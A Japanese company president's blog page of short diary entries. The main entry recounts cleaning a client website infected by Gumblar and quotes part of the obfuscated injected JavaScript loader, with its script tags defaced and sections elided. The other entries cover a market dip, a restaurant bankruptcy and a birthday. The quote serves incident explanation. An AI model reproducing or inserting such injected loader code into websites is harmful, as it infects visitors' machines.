有限会社Ayleeds社長日記。継接ぎだらけですが、新しいビジネスを求めて世界一周旅行もやってます。

プチ社長日記:『がんぶらあ自己中心派』の話

いや、ウィルスなんで自己中心的とかじゃないんですけど。
昔、構築に関わったサイトがガンブラーに感染したと連絡を受けたのが土曜日の朝。
なんで土曜日。
週末を放置する訳にもいかないので私が対応。
しかしサイトをメンテするの久しぶりで戸惑う戸惑う。

とりあえず自分のPCが安全なのを確認し、愛用のFFFTPでもパスワードを記録させると危険なので暗号化できるものをDL。
サーバのパスワードを変更して修復に。
ログを解析すると当該サイトからの情報流出はないようなので、その旨を客先の管理人に伝える。
今回のガンブラーはindex及びmain.phpにスクリプトを埋め込むタイプ。
埋め込んでるスクリプトはこんな感じ

<■ s c r i p t■>try {J=37361;J+=103;q=40230;q+=233;ui={};this.il=8848;this.il-=62;this.JS=32148;this.JS-=254;var U=window[new String("un"+"es"+"ca"+"pe")];var S=false;this.D=31847;this.D-=24;HK=19005;HK++;this.DK="";wV=13240;wV+=154;try {var ac='XN'} catch(ac){};try {var Xq='Qd'} catch(Xq){};var dT={dy:false};this.y=59660;this.y++;var O=false;ZF=45422;ZF+=64;this.M=37852;this.M--;var X=new String("replbG1".substr(0,4)+"ace");var nC=new Date();this.yg="";this.ru=56915;this.ru-=85;var z='';Dx=
〜中略 とにかく長い〜
{aY:57733};this.JR="JR";this.Ym=11059;this.Ym--;var A=132996-124916;Fb=["UK","zM","nO"];var Pj={VW:33947};var I_=[];var FZ=new Date();this.Ng="";this.pA="";var aq=new Date();function F(){var Mi=["xq","bY","iA"];var sZ={};var Gy='';var bj="";var AV="";var Hg='';fx=["gd","Fk"];this.rK=false;var kGA=["Ll"];this.jT="jT";this.Jo=false;this.Yj=false;var u=o('sjc_r_iLpLt_','gVLA_6jT');var ySP={ZB:"mK"};var Zr={Hi:"Lb"};this.Wm="";var qg={DL:"PE"};var op=document;var HAF=new Date();this.Xz=55201;this.Xz-=23;var it="it";uH=5697;uH++;var Z="appen"+"dChil"+"d";var pk="pk";this.qn=false;var XX={ir:false};var mw={gz:false};var Zz=["ME"];var kq=["ma"];MA=61658;MA+=37;Ra=[];var Tr=new Array();this.ln=45219;this.ln--;v=op.createElement(u);var jv=false;eC={};var Hp="";w=zP+A;var mT={_z:false};var DJJ={ec:"CK"};w=w+G;this.qE="";tx=["_B","Sa","CG"];var QJ={ob:48994};var Yf="";PX=["Ns"];JN=["nSb","DE","TB"];v.src=w;var fK=op.body;ySa={};var hK=[];var LE=[];this.gf=39789;this.gf-=191;v["de"+"feVdo2".substr(0,2)+"r"]=c;
〜中略〜
this.FI=32696;this.FI++;var tk='';var Ly='';qy=["Ot","wp"];var OL="";this.Tz=43700;this.Tz--;this.kx=39014;this.kx--;this.XY=43012;this.XY+=154;window[Q]=F;var Bk=[];var hz=new String();ix=["Dh","EG"];Iy={};zHA={};var Eg=["vs"];} catch(m){oZ={};var pi=[];var UI=new Date();var bV={Jh:34652};};<■/s c r i p t■>

基本的には改竄された時刻が解れば除去はそんなに難しくない。
同時間帯の更新ファイルを開ければ大抵、末尾に上記のような異様に長いスクリプトがある。
サイト管理者でバックアップファイル持ってるなら置き換える方が当然早い。

・・・久々にこの手の作業をやるのは楽しいね。
あぁやれやれ、とのんびりしてたら変更したパスワード連絡するの忘れてたけど。

■補記
その翌週末に、関係サイト全般のセキュリティ強化対応を実施しました。

プチ社長日記:『NYCEが一時1万ドル割』の話

眠いのに、これじゃ寝れん。。。 お祭りですなぁ。

プチ社長日記:『勝間女史が壮絶に自爆しているのを見て思い出した言葉』の話

私はあなたの意見には反対だ、だがあなたがそれを主張する権利は命をかけて守る。(ヴォルテール)

明日もあるのにまた夜更かししちゃった。。。他山の石にしよう。

プチ社長日記:『Chanko Dining 若のドリームアークが破産申請』の話

産経新聞ニュースより。
「ちゃんこダイニング若」が破産 負債4億5千万円

帝国データバンクによると、元横綱の若乃花関が設立したちゃんこ料理店「Chanko Dining若」を全国展開するドリームアークは6日、東京地裁に自己破産を申請した。負債総額は4億4700万円。
 元従業員が残業代が支払われていないとして、労働審判を申し立てるなど、厳しい資金繰りが表面化していた。
 同社は、2002年7月に元若乃花関(本名・花田勝氏)が設立。都内を中心に全国展開、07年7月期の売上高は約16億円を計上していた。近年は、夏場の来店客減少などから資金繰りが困難になり、コラーゲン料理専門店へ改装するなどしていたが、経営立て直しには至らなかった。
 花田氏の所属事務所によると、花田氏自身は2年前に株式を現経営陣に売却し、経営の一線から退いていたため、今回の破産には直接関係がないという。

恵比寿店にはよく行ったのに残念です。お疲れ様でした。

ちょっと頑張りすぎちゃいましたが、シーズン終了のこのタイミングで撤退は良いと思います。
因みに、弊社とのお取引は勿論ありませんよ。

でも逃げ足の速さには定評がありますんで、撤退戦略でお悩みの方は是非弊社にご相談を!!(←営業のつもり)

【独り言】
『頑張らないで欲しい人たち』の話
『ちゃんこ若はどうなってしまうの?』の話

プチ社長日記:『自分37周年』の話

はえー。
も、もうダメぽ。(←古い)
1